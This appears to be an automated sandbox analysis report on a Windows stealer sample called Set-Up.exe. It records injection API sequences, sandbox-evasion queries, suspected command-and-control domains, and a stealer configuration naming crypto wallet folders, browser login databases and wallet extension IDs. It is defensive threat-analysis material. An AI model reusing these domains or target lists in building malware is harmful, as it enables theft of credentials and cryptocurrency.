              Source: Set-Up.exe, 00000000.00000003.1922938061.0000000003B3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownHTTPS traffic detected: 104.21.75.15:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.75.15:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.75.15:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.75.15:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.75.15:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.75.15:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.75.15:443 -> 192.168.2.4:49742 version: TLS 1.2

              System Summary

              barindex
              Source: 00000000.00000002.1984991236.0000000002660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_026AF556 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_026AF556
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_026603960_2_02660396
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_026AF5560_2_026AF556
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_026952C40_2_026952C4
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_026882930_2_02688293
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_026A13430_2_026A1343
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_026823430_2_02682343
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_0268E02D0_2_0268E02D
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_026670F30_2_026670F3
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_026650F30_2_026650F3
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_026720FF0_2_026720FF
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_0267F0C30_2_0267F0C3
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_0268E0840_2_0268E084
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_0266C1730_2_0266C173
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_0268411E0_2_0268411E
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_026901E30_2_026901E3
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_026646D30_2_026646D3
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_0268D6DF0_2_0268D6DF
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_026797730_2_02679773
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_026A17230_2_026A1723
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_026817330_2_02681733
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_0268A7810_2_0268A781
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_0269A4F30_2_0269A4F3
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_026774A70_2_026774A7
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_026934870_2_02693487
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_0267A5030_2_0267A503
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_0266E5AA0_2_0266E5AA
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_0269B5830_2_0269B583
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_02691A0D0_2_02691A0D
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_02667A030_2_02667A03
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_026A1A130_2_026A1A13
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_0269AAE30_2_0269AAE3
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_0267BAC50_2_0267BAC5
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_02665AA30_2_02665AA3
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_02693A930_2_02693A93
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_02694B6B0_2_02694B6B
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_0269BB730_2_0269BB73
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_026728660_2_02672866
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_026808530_2_02680853
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_026778D70_2_026778D7
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_02681E630_2_02681E63
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_02695E530_2_02695E53
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_0267CE130_2_0267CE13
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_02669ED30_2_02669ED3
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_02667E930_2_02667E93
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_0268DF6F0_2_0268DF6F
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_0269DF630_2_0269DF63
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_02668C730_2_02668C73
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_02672C330_2_02672C33
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_026A1CD30_2_026A1CD3
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_02675CBB0_2_02675CBB
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_0266AD430_2_0266AD43
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_02685DBC0_2_02685DBC
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: String function: 02669803 appears 70 times
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: String function: 02674E23 appears 110 times
              Source: Set-Up.exeStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
              Source: Set-Up.exeStatic PE information: Number of sections : 11 > 10
              Source: Set-Up.exe, 00000000.00000003.1859572171.0000000002D9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Set-Up.exe
              Source: Set-Up.exe, 00000000.00000000.1739165137.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs Set-Up.exe
              Source: Set-Up.exeBinary or memory string: OriginalFileName vs Set-Up.exe
              Source: Set-Up.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 00000000.00000002.1984991236.0000000002660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_02660AA6 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,0_2_02660AA6
              Source: C:\Users\user\Desktop\Set-Up.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Set-Up.exe, 00000000.00000003.1888026494.0000000003A47000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1888776311.0000000003A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: C:\Users\user\Desktop\Set-Up.exeFile read: C:\Users\user\Desktop\Set-Up.exeJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: Set-Up.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: Set-Up.exeStatic file information: File size 4180480 > 1048576
              Source: Set-Up.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2fd400
              Source: Set-Up.exeStatic PE information: real checksum: 0x84afb72 should be: 0x4046cd
              Source: Set-Up.exeStatic PE information: section name: .didata
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_3_00B067C8 push eax; ret 0_3_00B067C9
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_3_00AC403F push eax; retf 0005h0_3_00AC4067
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_3_00B067C8 push eax; ret 0_3_00B067C9
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_3_00AC403F push eax; retf 0005h0_3_00AC4067
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_3_00B067C8 push eax; ret 0_3_00B067C9
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_3_00AC403F push eax; retf 0005h0_3_00AC4067
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_3_00B067C8 push eax; ret 0_3_00B067C9
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_3_00B067C8 push eax; ret 0_3_00B067C9
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_3_00AC403F push eax; retf 0005h0_3_00AC4067
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_0267E022 push esi; ret 0_2_0267E026
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_026A08D3 push eax; mov dword ptr [esp], 70737205h0_2_026A08D5
              Source: C:\Users\user\Desktop\Set-Up.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\Set-Up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\Set-Up.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exe TID: 7476Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exe TID: 7496Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: Set-Up.exe, 00000000.00000003.1982866897.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1982866897.0000000000A80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\Set-Up.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_02660396 mov edx, dword ptr fs:[00000030h]0_2_02660396
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_02660956 mov eax, dword ptr fs:[00000030h]0_2_02660956
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_02660FA6 mov eax, dword ptr fs:[00000030h]0_2_02660FA6
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_02660FA5 mov eax, dword ptr fs:[00000030h]0_2_02660FA5
              Source: C:\Users\user\Desktop\Set-Up.exeCode function: 0_2_02660D06 mov eax, dword ptr fs:[00000030h]0_2_02660D06

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Set-Up.exeString found in binary or memory: skatestringje.click
              Source: Set-Up.exeString found in binary or memory: miniatureyu.lat
              Source: Set-Up.exeString found in binary or memory: leggelatez.lat
              Source: Set-Up.exeString found in binary or memory: washyceehsu.lat
              Source: Set-Up.exeString found in binary or memory: bloodyswif.lat
              Source: Set-Up.exeString found in binary or memory: finickypwk.lat
              Source: Set-Up.exeString found in binary or memory: shoefeatthe.lat
              Source: Set-Up.exeString found in binary or memory: savorraiykj.lat
              Source: Set-Up.exeString found in binary or memory: kickykiduz.lat
              Source: Set-Up.exeBinary or memory string: Progman
              Source: C:\Users\user\Desktop\Set-Up.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Set-Up.exe, Set-Up.exe, 00000000.00000003.1952369366.0000000000AC4000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1983451685.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1952489776.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1952109530.0000000000AD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Set-Up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: Set-Up.exe PID: 7352, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Set-Up.exe, 00000000.00000003.1983451685.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":2097
              Source: Set-Up.exeString found in binary or memory: llets/ElectronCash
              Source: Set-Up.exe, 00000000.00000003.1940649069.0000000000A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
              Source: Set-Up.exe, 00000000.00000003.1983451685.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":2097
              Source: Set-Up.exe, 00000000.00000003.1983451685.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: },{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":$ Q&"
              Source: Set-Up.exe, 00000000.00000003.1940573119.0000000000ACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
              Source: Set-Up.exe, 00000000.00000003.1983451685.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: },{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":$ Q&"
              Source: Set-Up.exe, 00000000.00000003.1940402195.0000000000ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Set-Up.exe, 00000000.00000003.1940402195.0000000000ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
